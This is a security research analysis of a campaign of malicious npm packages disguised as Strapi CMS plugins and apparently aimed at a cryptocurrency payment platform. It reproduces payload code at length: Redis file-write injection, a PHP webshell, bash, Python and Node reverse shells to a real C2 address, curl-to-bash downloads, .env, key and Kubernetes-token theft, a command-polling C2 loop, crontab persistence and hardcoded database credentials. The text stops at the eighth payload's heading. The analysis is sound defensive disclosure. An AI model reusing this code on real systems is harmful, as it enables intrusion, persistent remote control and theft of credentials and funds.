Thirty-Six Malicious npm Strapi Packages Deploy Redis RCE, Database Theft, and Persistent C2

TL;DR

A coordinated campaign of thirty-six malicious npm packages disguised as Strapi CMS plugins was published using four sock-puppet npm accounts (umarbek1233, kekylf12, tikeqemif26, and umar_bektembiev1). Contrary to what you might expect from a package-spam campaign, the analyzed packages carry different payloads — eight distinct variants in total — revealing a real-time attack development session against a specific target.

The packages, in chronological order of publication:

1. strapi-plugin-cron (02:02 UTC) — Redis RCE exploitation: injects crontab entries, writes PHP webshells and Node.js reverse shells to Strapi uploads, attempts SSH authorized_keys injection, reads raw disk via mknod+dd, and exfiltrates a Guardarian API module.
2. strapi-plugin-config (02:47 UTC) — Redis + Docker overlay escape: discovers Docker overlay upperdir paths, writes shell payloads to overlay and host-accessible directories, launches a Python reverse shell, reads raw disk for Elasticsearch and wallet credentials, and injects hooks into node_modules.
3. strapi-plugin-server (03:01 UTC), strapi-plugin-database (03:05 UTC), strapi-plugin-core (03:06 UTC), strapi-plugin-hooks (03:37 UTC) — Direct reverse shells: hostname-gated (hostname.includes('prod')), downloads and executes a shell script from the C2, launches bash (port 4444) and Python (port 8888) reverse shells, and writes+executes shell payloads via Redis.
4. strapi-plugin-monitor (03:40 UTC) — Credential harvester + short C2: 8-phase attack with smart env_keys filtering, PostgreSQL connection string hunting, Redis access, wallet/key file search, and a 2.5-minute polling C2 loop.
5. strapi-plugin-events (03:46 UTC) — Full credential harvester + long C2: the most comprehensive variant with 11 phases including .env file theft, full environment dump, Strapi config exfiltration, filesystem-wide secret discovery, Redis data dump, network reconnaissance, Docker/Kubernetes secret theft, private key harvesting, and a 5-minute polling C2 loop.
6. strapi-plugin-seed (04:45 UTC) — Direct PostgreSQL database exploitation: connects using hardcoded credentials (user_strapi / 1QKtYPp18UsyU2ZwInVM), dumps Strapi webhooks and core_store secrets, enumerates all databases on the server, dumps tables matching wallet/transaction/deposit patterns, and explicitly probes for databases named guardarian, guardarian_payments, payments, exchange, and custody.
7. [email protected] (11:53 UTC) — Persistent implant: hostname-gated (hostname === 'prod-strapi'), writes a persistent C2 agent to /tmp/.node_gc.js, spawns it detached, and installs a crontab entry for survival across restarts.
8. [email protected] (15:04 UTC) — Fileless reverse shell + targeted credential theft: targets /var/www/nowguardarian-strapi/ and /opt/secrets/strapi-green.env, references a Jenkins CI pipeline in code comments, sweeps /opt/secrets/ and /var/www/*/, and spawns a fileless persistent reverse shell via node -e.

Impact:

• Exploits Redis via CONFIG SET to write crontab entries, webshells, reverse shells, and SSH keys
• Attempts Docker container escape via overlay filesystem discovery
• Launches bash and Python reverse shells on ports 4444 and 8888
• Reads raw disk via mknod+dd to extract passwords, wallet mnemonics, and SSH private keys
• Connects directly to PostgreSQL using hardcoded credentials and dumps wallet/transaction tables
• Enumerates all databases on the server, probing for guardarian, guardarian_payments, exchange, custody
• Exfiltrates .env files, environment variables, Strapi configuration, and private keys
• Dumps Redis keys and searches for PostgreSQL connection strings
• Steals Docker/Kubernetes secrets and service account tokens
• Opens polling C2 sessions for arbitrary command execution
• Installs persistent backdoors (crontab, detached processes, fileless execution)
• Targets a specific cryptocurrency payment platform’s infrastructure

Indicators of Compromise (IoC):

Analysis

Campaign Overview

Thirty-six packages were published using four npm accounts (umarbek1233 with 9 packages, kekylf12 with 7 packages, tikeqemif26 with 10 packages, umar_bektembiev1 with 10 packages) that share the same 3-file package structure and identical attack patterns. The umarbek1233 and kekylf12 accounts share the same disposable email provider (@sharebot.net), identical Node.js/npm versions (v24.13.1 / npm 11.8.0). This is a single operator using multiple sock-puppet accounts for the most targeted variants.

Notably, the umar_bektembiev1 account published the earliest wave — including strapi-plugin-nordica, strapi-plugin-finseven, strapi-plugin-guardarian-ext, and other packages — 3 days before the umarbek1233 and kekylf12 batches. The kekylf12 account was active during both later publishing windows — strapi-plugin-seed was published at 04:45 UTC (within an hour of the last umarbek1233 package), while the strapi-plugin-api versions came 7–10 hours later. The tikeqemif26 account published a further wave including the strapi-plugin-nordica-* series. This overlap suggests all four accounts were operated by the same actor.

Every package contains three files (package.json, index.js, postinstall.js), has no description, repository, or homepage, and uses version 3.6.8 to appear as a mature Strapi v3 community plugin. The package names follow the naming convention used by legitimate packages like strapi-plugin-comments or strapi-plugin-upload. All official Strapi plugins are scoped under @strapi/, making these unscoped names a social engineering choice targeting developers searching for community plugins.

The package.json across all ten packages is structurally identical:

1
{
2
  "name": "strapi-plugin-events",
3
  "version": "3.6.8",
4
  "main": "index.js",
5
  "scripts": {
6
    "postinstall": "node postinstall.js"
7
  },
8
  "license": "MIT"
9
}

The index.js exports an empty function, contributing nothing to any application:

1
module.exports = () => {};

The entire payload lives in postinstall.js, which is different for each package. The attack executes immediately on npm install via the postinstall script — no user interaction or require() call is needed. The postinstall script runs with the privileges of the installing user, which in CI/CD environments and Docker containers often means root access.

Payload 1: Redis RCE Exploitation (strapi-plugin-cron)

The earliest package in the campaign attempts to weaponize a locally accessible Redis instance for remote code execution. This is the most aggressive payload — it goes far beyond data theft to attempt persistent host compromise through Redis.

Chunked exfiltration. Unlike the later payloads that send data in a single POST, this variant implements a chunking protocol that splits large payloads into 50KB segments with part numbering (e.g., /exfil/cr-redis-info-p1of3):

1
// package/postinstall.js (strapi-plugin-cron)
2
function send(tag, data) {
3
  return new Promise(function (resolve) {
4
    var body = typeof data === 'string' ? data : JSON.stringify(data);
5
    var chunks = [];
6
    for (var i = 0; i < body.length; i += 50000) chunks.push(body.substring(i, i + 50000));
7
    var idx = 0;
8
    (function next() {
9
      if (idx >= chunks.length) return resolve();
10
      var s = chunks.length > 1 ? '-p' + (idx + 1) + 'of' + chunks.length : '';
11
      var req = http.request({
12
        hostname: VPS,
13
        port: PORT,
14
        path: '/exfil/' + tag + s,
15
        // ...
16
      });
17
    })();
18
  });
19
}

Redis crontab injection. The script uses the classic Redis CONFIG SET dir + SAVE technique to write arbitrary files to the filesystem. It attempts to inject a cron entry that downloads and executes a shell script from the C2 every minute:

1
// package/postinstall.js (strapi-plugin-cron)
2
var cronPayload = '\\n\\n*/1 * * * * curl -s http://' + VPS + ':' + PORT + '/shell.sh | bash\\n\\n';
3

4
var cronPaths = [
5
  { dir: '/var/spool/cron/crontabs', file: 'root' },
6
  { dir: '/var/spool/cron', file: 'root' },
7
  { dir: '/etc/cron.d', file: 'redis_job' },
8
  { dir: '/etc', file: 'crontab' },
9
  { dir: '/tmp', file: 'cron_test' },
10
];
11

12
for (var i = 0; i < cronPaths.length; i++) {
13
  var p = cronPaths[i];
14
  var cmd =
15
    'CONFIG SET dir ' +
16
    p.dir +
17
    '\r\n' +
18
    'CONFIG SET dbfilename ' +
19
    p.file +
20
    '\r\n' +
21
    'SET cron_payload "' +
22
    cronPayload +
23
    '"\r\n' +
24
    'SAVE\r\n';
25
  var result = await redisCmd(cmd);
26
}

This writes the Redis database file (containing the cron payload surrounded by binary data) to the system crontab directories. Five paths are attempted, including a /tmp/cron_test dry-run to verify write capability first.

PHP webshell and Node.js reverse shell via Redis. The script writes two additional payloads to Strapi’s public uploads directory:

1
// package/postinstall.js (strapi-plugin-cron)
2
// PHP webshell
3
var webshellPayload = '\\n<?php system($_GET["c"]); ?>\\n';
4
var webshellCmd =
5
  'CONFIG SET dir /app/public/uploads\r\n' +
6
  'CONFIG SET dbfilename shell.php\r\n' +
7
  'SET webshell "' +
8
  webshellPayload +
9
  '"\r\n' +
10
  'SAVE\r\n';
11

12
// Node.js reverse shell
13
var nodeShell =
14
  '\\nvar net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);' +
15
  'var c=new net.Socket();c.connect(' +
16
  PORT +
17
  ',"' +
18
  VPS +
19
  '",function(){' +
20
  'c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});\\n';

If Redis has write access to /app/public/uploads/, the attacker gets a PHP webshell at /uploads/shell.php?c=<command> and a Node.js reverse shell at /uploads/revshell.js.

SSH authorized_keys injection via Redis. The script attempts to write an SSH public key to /root/.ssh/authorized_keys:

1
// package/postinstall.js (strapi-plugin-cron)
2
var sshPayload = '\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7test root@vps\\n\\n';
3
var sshCmd =
4
  'CONFIG SET dir /root/.ssh\r\n' +
5
  'CONFIG SET dbfilename authorized_keys\r\n' +
6
  'SET sshkey "' +
7
  sshPayload +
8
  '"\r\n' +
9
  'SAVE\r\n';

The key used here (AAAAB3NzaC1yc2EAAAADAQABAAABgQC7test) is a placeholder — the comment // Generate SSH keypair on VPS later confirms this is preparation for a real key to be injected via the C2 channel.

Raw disk read. The script creates a block device node and uses dd to read raw disk, searching for secrets in the binary data:

1
// package/postinstall.js (strapi-plugin-cron)
2
run('mknod /tmp/hostdisk b 8 1 2>/dev/null');
3

4
var rawSecrets = run(
5
  'dd if=/dev/sda1 bs=4096 count=5000 2>/dev/null | strings | ' +
6
    'grep -iE "PASSWORD=|SECRET=|ELASTIC|WALLET|PRIVATE_KEY|MNEMONIC|API_KEY=" | sort -u | head -100',
7
  60000
8
);

This bypasses filesystem permissions entirely — even deleted files or files in other containers sharing the same host disk can be recovered this way.

Guardarian API module exfiltration. The script specifically targets a Guardarian API integration module, confirming knowledge of the target as early as the first package:

1
// package/postinstall.js (strapi-plugin-cron)
2
await send('cr-gd-module', run('find /app/exteranl-apis -type f -name "*.js" -exec cat {} + 2>/dev/null'));

Note the typo exteranl-apis (instead of external-apis), which must match the target’s actual directory name — further evidence of prior reconnaissance.

Payload 2: Redis + Docker Overlay Escape (strapi-plugin-config)

Published 45 minutes after the first package, this payload adds Docker container escape techniques to the Redis exploitation approach.

Docker overlay filesystem discovery. The script parses mount output to find the Docker overlay upperdir — the host filesystem path where the container’s writable layer is stored:

1
// package/postinstall.js (strapi-plugin-config)
2
var mountInfo = run('mount | grep overlay | head -3');
3
var upperMatch = mountInfo.match(/upperdir=([^,\s]+)/);
4
var upperDir = upperMatch ? upperMatch[1] : '';

If the container has access to /proc/mounts or the mount command, the upperdir reveals the absolute host path. The script then uses Redis CONFIG SET dir to write shell payloads to the overlay path, effectively writing files visible to the host outside the container.

Strategic Redis write targets. The script expands the Redis write strategy beyond crontab to multiple directories, including the discovered overlay path:

1
// package/postinstall.js (strapi-plugin-config)
2
var paths = [
3
  { dir: upperDir, file: 'shell.sh', desc: 'overlay-root' },
4
  { dir: '/tmp', file: 'shell.sh', desc: 'tmp' },
5
  { dir: '/var/lib/redis', file: 'shell.sh', desc: 'redis-lib' },
6
  { dir: '/var/tmp', file: 'shell.sh', desc: 'var-tmp' },
7
  { dir: '/dev/shm', file: 'shell.sh', desc: 'dev-shm' },
8
  { dir: '/app/public', file: 'shell.sh', desc: 'app-public' },
9
  { dir: '/app/public/uploads', file: 'shell.sh', desc: 'app-uploads' },
10
];

Python reverse shell. In addition to Redis-based techniques, the script launches a direct Python reverse shell on port 4444:

1
// package/postinstall.js (strapi-plugin-config)
2
execSync(
3
  'nohup python3 -c "import socket,subprocess,os;s=socket.socket();' +
4
    "s.connect(('" +
5
    VPS +
6
    "',4444));" +
7
    'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' +
8
    "subprocess.call(['/bin/bash','-i'])\" &>/dev/null &",
9
  { timeout: 3000 }
10
);

Raw disk read for specific targets. The disk scanning expands to search for Elasticsearch credentials, Docker container configs, and cryptocurrency wallet data:

1
// package/postinstall.js (strapi-plugin-config)
2
var rawDocker = run(
3
  'dd if=/dev/sda1 bs=4096 skip=0 count=50000 2>/dev/null | strings | ' +
4
    'grep -B1 -A1 "config.v2.json\\|HOT_WALLET\\|COLD_WALLET\\|DEPOSIT_ADDRESS\\|payment\\|MNEMONIC" | head -100',
5
  120000
6
);

The search for HOT_WALLET, COLD_WALLET, DEPOSIT_ADDRESS, and MNEMONIC in raw disk data confirms the cryptocurrency theft objective.

Node_modules hooks injection. The script writes a reverse shell trigger into the application’s node_modules directory via Redis:

1
// package/postinstall.js (strapi-plugin-config)
2
var hookPayload = '\\nrequire("child_process").execSync("curl ' + VPS + ':' + PORT + '/shell.sh|bash");\\n';
3
var hookCmd =
4
  'CONFIG SET dir /app/node_modules\r\n' +
5
  'CONFIG SET dbfilename .hooks.js\r\n' +
6
  'SET hook "' +
7
  hookPayload +
8
  '"\r\n' +
9
  'SAVE\r\n';

Payload 3: Direct Reverse Shells (strapi-plugin-server, database, core, hooks)

Four packages published between 03:01 and 03:37 UTC share an identical, simplified payload. The attacker appears to have abandoned the Redis exploitation approach (likely because it wasn’t working) and switched to direct shell execution.

Hostname gating. These packages gate on the hostname containing prod:

1
// package/postinstall.js (strapi-plugin-server)
2
var hn = run('hostname').trim();
3
await send('sv-start', hn);
4
if (!hn.includes('prod')) {
5
  await send('sv-skip', 'not-prod');
6
  return;
7
}

This is a looser check than Payload 7’s exact prod-strapi match — it triggers on any hostname containing “prod” (e.g., prod-strapi, production-1, prod-web).

Multi-vector reverse shell. The script attempts three different reverse shell methods in rapid succession:

1
// package/postinstall.js (strapi-plugin-server)
2
// 1. Download and execute shell script from C2
3
run('curl -s http://' + VPS + ':9999/shell.sh -o /tmp/vps_shell.sh 2>/dev/null');
4
run('chmod +x /tmp/vps_shell.sh');
5
execSync('nohup bash /tmp/vps_shell.sh &>/dev/null &', { timeout: 3000 });
6

7
// 2. Bash reverse shell on port 4444
8
execSync('nohup bash -c "bash -i >& /dev/tcp/' + VPS + '/4444 0>&1" &>/dev/null &', { timeout: 3000 });
9

10
// 3. Python reverse shell on port 8888
11
execSync(
12
  'nohup python3 -c "import socket,subprocess,os;s=socket.socket();' +
13
    "s.connect(('" +
14
    VPS +
15
    "',8888));" +
16
    'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' +
17
    "subprocess.call(['/bin/bash','-i'])\" &>/dev/null &",
18
  { timeout: 3000 }
19
);

Three different ports (9999, 4444, 8888) are used, suggesting the attacker has multiple listeners ready and is hedging against firewall rules that might block specific ports.

Redis-assisted shell execution. As a fallback, the script writes a shell downloader via Redis and executes the resulting file:

1
// package/postinstall.js (strapi-plugin-server)
2
c.write(
3
  'CONFIG SET dir /tmp\r\nCONFIG SET dbfilename redis_exec.sh\r\n' +
4
    'SET x "\\n#!/bin/bash\\ncurl -s http://' +
5
    VPS +
6
    ':9999/shell.sh|bash\\n"\r\n' +
7
    'SAVE\r\nCONFIG SET dir /var/lib/redis\r\nCONFIG SET dbfilename dump.rdb\r\n'
8
);
9

10
// Later: execute the Redis-written file
11
run('chmod +x /tmp/redis_exec.sh 2>/dev/null; nohup bash /tmp/redis_exec.sh &>/dev/null &');

Payload 4: Credential Harvester + Short C2 (strapi-plugin-monitor)

Published just 3 minutes before strapi-plugin-events, this package represents a pivot from direct exploitation to reconnaissance. The attacker stopped trying to get a shell and started collecting data.

Smart beacon with env_keys filtering. Unlike the raw hostname beacon in earlier payloads, this variant’s beacon includes a filtered list of sensitive-looking environment variable names:

1
// package/postinstall.js (strapi-plugin-monitor)
2
var info = {
3
  id: ID,
4
  hostname: run('hostname').trim(),
5
  whoami: run('whoami').trim(),
6
  pwd: process.cwd(),
7
  uname: run('uname -a').trim(),
8
  ip: run('hostname -I 2>/dev/null || echo n/a').trim(),
9
  node: process.version,
10
  env_keys: Object.keys(process.env).filter(function (k) {
11
    return /key|secret|pass|token|db|redis|api|jwt|admin|auth|wallet|ledger/i.test(k);
12
  }),
13
};

The env_keys filter tells the attacker which sensitive variables exist before exfiltrating their values — an optimization for noisy environments with hundreds of variables.

File dump with /opt/app/ paths. The target paths shift from /app/ (standard Docker) to /opt/app/ — a convention used by some deployment tools:

1
// package/postinstall.js (strapi-plugin-monitor)
2
var files = [
3
  '/opt/app/.env',
4
  '/opt/app/config/database.js',
5
  '/opt/app/config/server.js',
6
  '/opt/app/config/plugins.js',
7
  '/opt/app/package.json',
8
  '/root/.env',
9
  '/home/strapi/.env',
10
  '/etc/hostname',
11
  process.cwd() + '/.env',
12
  process.cwd() + '/config/database.js',
13
];

PostgreSQL connection string hunting. A new phase not present in any earlier payload:

1
// package/postinstall.js (strapi-plugin-monitor)
2
var pgstr = run("grep -r 'postgres://' /opt/app/ 2>/dev/null; grep -r 'DATABASE_URL' /opt/app/ 2>/dev/null").slice(
3
  0,
4
  5000
5
);
6
await post('/c2/' + ID + '/pgstr', pgstr);

Shorter C2 loop. The polling C2 runs for 30 rounds at 5-second intervals (2.5 minutes), compared to the 60 rounds (5 minutes) in the next payload:

1
// package/postinstall.js (strapi-plugin-monitor)
2
for (var round = 0; round < 30; round++) {
3
  var cmdResp = await post('/c2/' + ID + '/poll', JSON.stringify({ round: round }));
4
  if (cmdResp && cmdResp.trim() && cmdResp.trim() !== 'nop') {
5
    var result = run(cmdResp.trim());
6
    await post(
7
      '/c2/' + ID + '/result',
8
      JSON.stringify({ round: round, cmd: cmdResp.trim(), out: result.slice(0, 100000) })
9
    );
10
  }
11
  await new Promise(function (r) {
12
    setTimeout(r, 5000);
13
  });
14
}

Payload 5: Full Credential Harvester + Long C2 (strapi-plugin-events)

Published 6 minutes after strapi-plugin-monitor, this is the most comprehensive reconnaissance payload in the campaign. It extends Payload 4 with broader file discovery, a full environment dump, Redis data extraction, network topology mapping, Docker/Kubernetes secret theft, and a longer C2 window.

C2 infrastructure setup. The script establishes communication with the hardcoded server:

1
// package/postinstall.js (strapi-plugin-events)
2
var http = require('http');
3
var exec = require('child_process').execSync;
4
var fs = require('fs');
5
var VPS = '144.31.107.231';
6
var PORT = 9999;
7
var ID = 'guard-' + Math.random().toString(36).slice(2, 8);

Each infected host generates a random session ID (e.g., guard-k7f2m9) used to namespace all C2 communications. The post() helper sends data via plain HTTP POST to the C2 server with a 15-second timeout.

Phase 1: Beacon. The script sends system reconnaissance data to /c2/<id>/beacon:

1
// package/postinstall.js (strapi-plugin-events)
2
var info = {
3
  id: ID,
4
  hostname: run('hostname').trim(),
5
  whoami: run('whoami').trim(),
6
  pwd: process.cwd(),
7
  uname: run('uname -a').trim(),
8
  ip: run('hostname -I 2>/dev/null || echo n/a').trim(),
9
  node: process.version,
10
};
11
await post('/c2/' + ID + '/beacon', info);

This gives the attacker an immediate inventory of the compromised host: username, hostname, kernel version, internal IP, and Node.js version.

Phase 2: .env file theft. The script reads .env files from hardcoded paths targeting common Strapi deployment layouts:

1
// package/postinstall.js (strapi-plugin-events)
2
var envPaths = [
3
  '/app/.env',
4
  '/app/.env.production',
5
  '/app/.env.local',
6
  '/data/.env',
7
  '/home/strapi/.env',
8
  '/home/node/.env',
9
  '/opt/app/.env',
10
  '/srv/.env',
11
  process.cwd() + '/../.env',
12
  process.cwd() + '/../../.env',
13
  process.cwd() + '/../../../.env',
14
];

The paths /app/.env, /home/strapi/.env, and /home/node/.env target Docker containers running Strapi with common base images. The relative path traversals (../../.env) walk up from the node_modules install directory to reach the project root.

Phase 3: Environment variable dump. The script runs env via shell to capture every environment variable, including database connection strings, cloud provider credentials, and JWT secrets that Strapi applications commonly configure through environment variables.

1
// package/postinstall.js (strapi-plugin-events)
2
var envDump = run('env');
3
await post('/c2/' + ID + '/envdump', envDump.slice(0, 100000));

Phase 4: Strapi configuration files. The script specifically targets Strapi’s configuration directory structure:

1
// package/postinstall.js (strapi-plugin-events)
2
var configs = [
3
  '/app/config/database.js',
4
  '/app/config/server.js',
5
  '/app/config/plugins.js',
6
  '/app/config/middleware.js',
7
  '/app/config/functions/bootstrap.js',
8
  '/app/config/environments/production/database.json',
9
  '/app/package.json',
10
  '/app/yarn.lock',
11
];

These files contain database connection details, API keys for third-party plugins, and the application’s dependency tree.

Phase 5: Filesystem-wide .env discovery. The script uses find to locate every .env file on the system, up to 5 directories deep:

1
// package/postinstall.js (strapi-plugin-events)
2
var allEnv = run("find / -maxdepth 5 -name '.env*' -type f 2>/dev/null");
3
await post('/c2/' + ID + '/allenv', allEnv);

This is the behavior flagged by our dynamic analysis system. It catches .env files in non-standard locations that the hardcoded paths in Phase 2 would miss.

Phase 6: Redis data dump. The script opens a raw TCP connection to the local Redis instance and dumps all keys:

1
// package/postinstall.js (strapi-plugin-events)
2
var net = require('net');
3
var c = new net.Socket();
4
c.connect(6379, '127.0.0.1', function () {
5
  c.write('INFO server\r\nDBSIZE\r\nKEYS *\r\n');
6
});

Strapi deployments commonly use Redis for caching and session storage. This dumps server info, database size, and every key name, which can include session tokens and cached API responses.

Phase 7: Network reconnaissance. The script collects network topology information:

1
// package/postinstall.js (strapi-plugin-events)
2
var internal = run(
3
  'cat /etc/hosts 2>/dev/null; echo ---RESOLV---; cat /etc/resolv.conf 2>/dev/null; echo ---ARP---; arp -a 2>/dev/null; echo ---ROUTE---; ip route 2>/dev/null'
4
);

This maps the internal network for lateral movement: DNS resolvers, ARP neighbors, and routing tables reveal other services and hosts reachable from the compromised container.

Phase 8: Docker and Kubernetes secrets. The script attempts to read container orchestration secrets:

1
// package/postinstall.js (strapi-plugin-events)
2
var docker = run(
3
  'ls -la /var/run/docker.sock 2>/dev/null; echo ---; cat /run/secrets/* 2>/dev/null; echo ---DOCKERENV---; cat /.dockerenv 2>/dev/null; echo ---KUBE---; ls -la /var/run/secrets/kubernetes.io/ 2>/dev/null; cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null'
4
);

If the Docker socket is accessible, the attacker can control the host’s Docker daemon. The Kubernetes service account token enables API access to the cluster, potentially allowing privilege escalation beyond the compromised pod.

Phase 9: Private key and wallet theft. The script uses find to locate cryptographic keys and cryptocurrency wallet files:

1
// package/postinstall.js (strapi-plugin-events)
2
var keys = run(
3
  "find / -maxdepth 4 \\( -name '*.pem' -o -name '*.key' -o -name 'id_rsa*' -o -name 'wallet*' -o -name '*private*' -o -name '*secret*' \\) ! -path '*/ssl/certs/*' ! -path '*/node_modules/*' -type f 2>/dev/null"
4
);

It then reads up to 10 of the discovered files and sends their contents to the C2 server. This captures TLS private keys, SSH keys, and any files with “private” or “secret” in their name.

Phase 10: Strapi database access attempt. The script attempts to load the application’s knex database driver and configuration:

1
// package/postinstall.js (strapi-plugin-events)
2
var dbQuery = run(
3
  "node -e \"const k=require('/app/node_modules/knex');const c=require('/app/config/database.js');\" 2>&1"
4
);

Phase 11: Polling C2 loop. The final phase establishes a persistent command-and-control channel. The script polls the C2 server every 5 seconds for 60 rounds (approximately 5 minutes), executing any command the server returns:

1
// package/postinstall.js (strapi-plugin-events)
2
for (var round = 0; round < 60; round++) {
3
  var cmdResp = await post('/c2/' + ID + '/poll', JSON.stringify({ round: round }));
4
  if (cmdResp && cmdResp.trim() && cmdResp.trim() !== 'nop' && cmdResp.trim() !== 'ok') {
5
    var result = run(cmdResp.trim());
6
    await post(
7
      '/c2/' + ID + '/result',
8
      JSON.stringify({ round: round, cmd: cmdResp.trim(), out: result.slice(0, 100000) })
9
    );
10
  }
11
  await new Promise(function (r) {
12
    setTimeout(r, 5000);
13
  });
14
}

This gives the attacker interactive shell access to the compromised host. The server responds with nop or ok when idle, and with a shell command when active. Results are sent back to /c2/<id>/result. Using execSync means each command runs with the full privileges of the Node.js process.

Data Exfiltration

All stolen data is sent via plain HTTP POST to 144[.]31[.]107[.]231:9999. The C2 protocol uses path-based routing:

No encryption is used. All data, including private keys and credentials, is transmitted in plaintext over HTTP.

Payload 6: PostgreSQL Database Exploitation (strapi-plugin-seed)

Published at 04:45 UTC under the kekylf12 account — just one hour after the last umarbek1233 package — this payload represents the most direct evidence of prior compromise. It connects to the target’s PostgreSQL database using hardcoded credentials, confirming the attacker already had access before this campaign began.

Hardcoded database credentials. The script uses knex (Strapi’s database driver) with real credentials baked into the source:

1
// package/postinstall.js (strapi-plugin-seed)
2
var knex = require('knex');
3
var db = knex({
4
  client: 'pg',
5
  connection: {
6
    host: process.env.DATABASE_HOST || '127.0.0.1',
7
    port: process.env.DATABASE_PORT || 5432,
8
    user: process.env.DATABASE_USERNAME || 'user_strapi',
9
    password: process.env.DATABASE_PASSWORD || '1QKtYPp18UsyU2ZwInVM',
10
    database: process.env.DATABASE_NAME || 'strapi',
11
  },
12
});

The fallback values user_strapi and 1QKtYPp18UsyU2ZwInVM are not generic defaults — they are the target’s actual database credentials. The code first checks environment variables (which would be set in the target’s container), falling back to hardcoded values if the variables are missing.

Strapi data dump. The script queries Strapi-specific tables for secrets:

1
// package/postinstall.js (strapi-plugin-seed)
2
// Strapi webhooks (internal API URLs)
3
var webhooks = await db.raw('SELECT * FROM strapi_webhooks');
4

5
// core_store — filtered for sensitive values
6
var store = await db.raw('SELECT * FROM core_store');
7
for (var i = 0; i < store.rows.length; i++) {
8
  var row = store.rows[i];
9
  var val = String(row.value || '');
10
  if (
11
    val.indexOf('secret') >= 0 ||
12
    val.indexOf('token') >= 0 ||
13
    val.indexOf('key') >= 0 ||
14
    val.indexOf('api') >= 0 ||
15
    val.indexOf('webhook') >= 0 ||
16
    val.indexOf('grant') >= 0 ||
17
    val.indexOf('password') >= 0 ||
18
    val.indexOf('auth') >= 0 ||
19
    row.key.indexOf('grant') >= 0 ||
20
    row.key.indexOf('users') >= 0
21
  ) {
22
    await post('/db/' + ID + '/store-' + i, JSON.stringify(row));
23
  }
24
}
25

26
// users-permissions settings (OAuth provider secrets)
27
var perms = await db.raw(
28
  "SELECT * FROM core_store WHERE key LIKE '%users-permissions%' OR key LIKE '%grant%' OR key LIKE '%provider%'"
29
);

Cross-database enumeration. The script lists all databases on the PostgreSQL server, then connects to each non-system database and dumps tables matching cryptocurrency-related patterns:

1
// package/postinstall.js (strapi-plugin-seed)
2
var dbs = await db.raw('SELECT datname FROM pg_database WHERE datistemplate = false');
3

4
for (var i = 0; i < otherDbs.length; i++) {
5
  var db2 = knex({
6
    client: 'pg',
7
    connection: {
8
      host: '127.0.0.1',
9
      port: 5432,
10
      user: 'user_strapi',
11
      password: '1QKtYPp18UsyU2ZwInVM',
12
      database: otherDbs[i].datname,
13
    },
14
  });
15
  var tables2 = await db2.raw("SELECT tablename FROM pg_tables WHERE schemaname='public'");
16
  for (var j = 0; j < tables2.rows.length; j++) {
17
    var tn = tables2.rows[j].tablename;
18
    if (
19
      /wallet|key|address|transaction|deposit|withdraw|hot|cold|secret|setting|config|partner|user|token|balance/i.test(
20
        tn
21
      )
22
    ) {
23
      var data = await db2.raw('SELECT * FROM "' + tn + '" LIMIT 50');
24
      await post('/db/' + ID + '/otherdb-' + otherDbs[i].datname + '-' + tn, JSON.stringify(data.rows));
25
    }
26
  }
27
}

The table name regex — wallet|transaction|deposit|withdraw|hot|cold|balance — is purpose-built for a cryptocurrency platform’s database schema.

Explicit Guardarian database probing. The script then attempts to connect to six specific database names:

1
// package/postinstall.js (strapi-plugin-seed)
2
for (var dbname of ['payments', 'api_payments', 'guardarian', 'guardarian_payments', 'exchange', 'custody']) {
3
  try {
4
    var db3 = knex({
5
      client: 'pg',
6
      connection: {
7
        host: '127.0.0.1',
8
        port: 5432,
9
        user: 'user_strapi',
10
        password: '1QKtYPp18UsyU2ZwInVM',
11
        database: dbname,
12
      },
13
    });
14
    var t3 = await db3.raw("SELECT tablename FROM pg_tables WHERE schemaname='public'");
15
    await post('/db/' + ID + '/found-db-' + dbname, JSON.stringify(t3.rows));
16
  } catch (e) {}
17
}

The names guardarian, guardarian_payments, exchange, and custody leave no doubt about the target. The attacker is betting that the Strapi database user has cross-database access to the payment platform’s core financial databases — a common misconfiguration when multiple services share a PostgreSQL instance.

PostgreSQL role enumeration. The script also dumps all database roles and their privileges:

1
// package/postinstall.js (strapi-plugin-seed)
2
var roles = await db.raw('SELECT rolname, rolsuper, rolcanlogin FROM pg_roles');
3
await post('/db/' + ID + '/pg-roles', JSON.stringify(roles.rows));

This reveals whether user_strapi has superuser access and what other accounts exist on the server.

C2 polling loop. Like Payload 5, this payload includes a 60-round polling C2 loop (5 minutes), using the /db/<id>/ path namespace with session IDs prefixed db-.

Payload 7: Hostname-Gated Persistent Implant ([email protected])

[email protected] was published ~8 hours after the first batch, under a second npm account (kekylf12 <[email protected]>). It represents a significant evolution — this is no longer a grab-and-go credential harvester but a persistent implant designed to survive beyond the postinstall window.

Hostname gating. The script exits immediately unless the hostname matches a specific value:

1
// package/postinstall.js ([email protected])
2
var hn = cp.execSync('hostname', { encoding: 'utf8' }).trim();
3
if (hn !== 'prod-strapi') process.exit(0);

This means the attacker knows their target’s production hostname. The package will silently do nothing on any other machine — developer workstations, CI runners with different hostnames, or staging environments all get a clean exit.

Persistent C2 script. Instead of running the C2 loop inline (which dies when postinstall completes), the script writes a standalone C2 agent to disk:

1
// package/postinstall.js ([email protected])
2
fs.writeFileSync('/tmp/.node_gc.js', c2script);
3
var child = cp.spawn('node', ['/tmp/.node_gc.js'], {
4
  detached: true,
5
  stdio: 'ignore',
6
  env: process.env,
7
});
8
child.unref();

The file is named .node_gc.js — a dotfile that blends in with Node.js runtime files. The detached: true and child.unref() calls ensure the process continues running after the parent exits. The C2 agent inside polls /shell/poll every 3 seconds (faster than Payload 5’s 5 seconds) and sends command output to /shell/result.

Crontab persistence. The script installs a crontab entry that restarts the C2 agent if it gets killed:

1
// package/postinstall.js ([email protected])
2
cp.execSync(
3
  '(crontab -l 2>/dev/null; echo "* * * * * pgrep -f node_gc || node /tmp/.node_gc.js &") | sort -u | crontab -',
4
  { timeout: 5000 }
5
);

This runs every minute: if no process matching node_gc is found, it restarts the agent. The sort -u pipe deduplicates the entry across multiple installs.

No credential harvesting. Unlike the earlier payloads, this variant does not steal .env files, Redis data, or private keys. It is a pure access-maintenance tool — the attacker either already has credentials or plans to harvest them interactively through the C2 channel.

Payload 8: Fileless Reverse Shell + Targeted Credential Theft ([email protected])

